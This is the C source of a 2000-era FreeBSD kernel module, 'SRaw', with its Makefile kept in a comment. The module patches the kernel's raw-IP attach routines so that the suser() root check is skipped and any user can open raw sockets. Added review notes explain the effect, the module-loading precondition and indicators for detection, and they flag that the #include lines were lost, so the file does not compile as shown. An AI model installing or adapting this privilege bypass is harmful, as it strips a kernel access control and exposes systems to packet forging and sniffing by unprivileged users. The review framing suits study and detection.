/*
 * Name: SRaw for FreeBSD ( sock.c )
 * Date: Mon May 01 13:12:43 2000
 * Author: pIGpEN [ pigpen@s0ftpj.org, deadhead@sikurezza.org ]
 *
 * SoftProject 2000 - Digital Sekurity for Y2k
 * Sikurezza.org - Italian Security MailingList
 *
 * COFFEE-WARE LICENSE - This source code is like "THE BEER-WARE LICENSE" by
 * Poul-Henning Kamp but you can give me in return a coffee.
 *
 * Tested on: FreeBSD 3.4-RELEASE FreeBSD 3.4-RELEASE #5: Mon Mar i386
 *
 * All users are allowed to open raw sockets...
 * This kld disables EPERM in socket() and permits to allocate inpcb even if
 * the socket is raw and users haven't root permissions... bypassing suser()
 * in pru_attach() functions...
 *
 *
 * Idea & Code for Linux by Gigi_Sull
 * Code for FreeBSD by pIGpEN / S0ftPj
 */

/*
 * Review notes:
 *
 * - What the module changes: it overwrites the pru_attach function pointer
 *   reached through inetsw[] for the raw-IP protocol entries with a copy of
 *   the attach routine that has the suser() privilege check commented out.
 *   While it is loaded, the kernel no longer enforces "raw sockets require
 *   root" on those entries.
 * - Precondition: the Makefile kept at the end of this listing loads the
 *   module with /sbin/kldload, so installing it needs the ability to load
 *   kernel modules. Restricting module loading (for example by running at a
 *   raised securelevel; confirm the behaviour for the release in use) is the
 *   relevant control.
 * - What to look for: a module registered as "S_Raw" (built as KMOD "sock"
 *   per the Makefile below) in the loaded-module list, or unprivileged
 *   processes holding raw sockets. These names are trivially changed, so
 *   treat them as indicators for this exact listing only.
 * - NOTE(review): the header names of the #include directives below were
 *   lost when the listing was extracted; the file does not compile as shown.
 */

#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include

/* Kernel protocol switch table and raw-IP pcb bookkeeping, defined elsewhere. */
extern struct protosw inetsw[];
extern struct inpcbinfo ripcbinfo;

/* Replacement attach routine defined at the bottom of this file. */
static int rip_attach __P((struct socket *, int, struct proc *));
/* Saved original attach pointer, written on MOD_LOAD and restored on MOD_UNLOAD. */
static int (*old_rip_attach) __P((struct socket *, int, struct proc *));
static int module_handler __P((module_t, int, void *));

/*
 * attach(x) expands to an lvalue: the pru_attach slot of the user-request
 * table belonging to the inetsw[] entry that ip_protox[] maps protocol x to.
 * It is used both to read the current pointer and to assign a new one.
 */
#define attach(x) inetsw[ip_protox[x]].pr_usrreqs->pru_attach

/*
 * Module event handler.
 *
 * MOD_LOAD:   saves the current pru_attach pointer of the IPPROTO_RAW entry
 *             in old_rip_attach, then points the RAW, ICMP, IGMP, RSVP, IPIP,
 *             IDP and protocol-0 slots at this file's rip_attach.
 * MOD_UNLOAD: writes old_rip_attach back into the same seven slots.
 *
 * Both cases run between splnet() and splx(s).
 * Always returns 0; any other cmd value falls through the switch untouched
 * (there is no default case).
 *
 * mod and arg are unused.
 */
static int
module_handler(module_t mod, int cmd, void *arg)
{
	int s;

	switch(cmd) {
	case MOD_LOAD:
		s = splnet();
		/*
		 * Only the IPPROTO_RAW pointer is remembered. Unload restores
		 * that one value into every slot, so this presumably relies on
		 * all seven entries sharing the same original attach routine
		 * -- NOTE(review): confirm against the kernel's inetsw[].
		 */
		old_rip_attach = attach(IPPROTO_RAW);

		attach(IPPROTO_RAW) = rip_attach;
		attach(IPPROTO_ICMP) = rip_attach;
		attach(IPPROTO_IGMP) = rip_attach;
		attach(IPPROTO_RSVP) = rip_attach;
		attach(IPPROTO_IPIP) = rip_attach;
		attach(IPPROTO_IDP) = rip_attach;
		attach(0) = rip_attach;
		splx(s);
		break;

	case MOD_UNLOAD:
		s = splnet();
		/* Put the saved pointer back so the original check is enforced again. */
		attach(IPPROTO_RAW) = old_rip_attach;
		attach(IPPROTO_ICMP) = old_rip_attach;
		attach(IPPROTO_IGMP) = old_rip_attach;
		attach(IPPROTO_RSVP) = old_rip_attach;
		attach(IPPROTO_IPIP) = old_rip_attach;
		attach(IPPROTO_IDP) = old_rip_attach;
		attach(0) = old_rip_attach;
		splx(s);
		break;
	}

	return 0;
}

/* Module descriptor: registered name, event handler, no private argument. */
static moduledata_t s_raw = {
	"S_Raw",
	module_handler,
	NULL
};

DECLARE_MODULE(S_Raw, s_raw, SI_SUB_PSEUDO, SI_ORDER_ANY);

/* Socket buffer sizes passed to soreserve() in rip_attach below. */
static u_long rip_sendspace = 8192; /* RIPSNDQ */
static u_long rip_recvspace = 8192; /* RIPRCVQ */

/*
 * Replacement pru_attach routine installed by module_handler on MOD_LOAD.
 *
 * so    - socket being attached; must not already have a pcb (panics if
 *         sotoinpcb(so) is non-NULL).
 * proto - protocol number, stored in the new pcb's inp_ip_p.
 * p     - calling process; passed to in_pcballoc() only. Its credentials
 *         are never examined here.
 *
 * Returns 0 on success, otherwise the error from in_pcballoc() or
 * soreserve().
 */
static int
rip_attach(struct socket *so, int proto, struct proc *p)
{
	struct inpcb *inp;
	int error, s;

	inp = sotoinpcb(so);
	if (inp)
		panic("rip_attach");

	/*
	 * We don't want suser() call
	 *
	 * if (p && (error = suser(p->p_ucred, &p->p_acflag)) != 0)
	 *	return error;
	 */
	/*
	 * Review: the disabled block above is the privilege check. With it
	 * commented out, nothing in this routine distinguishes root from any
	 * other caller, which is the whole effect of the module.
	 */

	s = splnet();
	error = in_pcballoc(so, &ripcbinfo, p);
	splx(s);

	if (error)
		return error;

	/*
	 * NOTE(review): on soreserve() failure this returns without any
	 * visible release of the pcb allocated just above -- confirm whether
	 * the caller cleans up.
	 */
	error = soreserve(so, rip_sendspace, rip_recvspace);
	if (error)
		return error;

	inp = (struct inpcb *)so->so_pcb;
	inp->inp_ip_p = proto;

	return 0;
}

/*
 * The build Makefile shipped with this listing follows, kept inside a comment.
 * NOTE(review): the argument of the final .include line was lost in
 * extraction, like the #include names above.
 */
/*
# SoftProject 2000 - Digital Sekurity for Y2k
# Sikurezza.org - Italian Security MailingList
#
# COFFEE-WARE LICENSE - This source code is like "THE BEER-WARE LICENSE" by
# Poul-Henning Kamp but you can give me in return a coffee.
#
# Tested on: FreeBSD 3.4-RELEASE FreeBSD 3.4-RELEASE #3: Thu Mar i386
# < pigpen@s0ftpj.org >

.PATH: /sys/kern
SRCS = sock.c
CFLAGS+= -I/sys
KMOD = sock
NOMAN = t
KLDMOD = t

KLDLOAD = /sbin/kldload
KLDUNLOAD = /sbin/kldunload

CLEANFILES+= ${KMOD}

load:
	${KLDLOAD} -v ./${KMOD}

unload:
	${KLDUNLOAD} -v -n ${KMOD}

.include
*/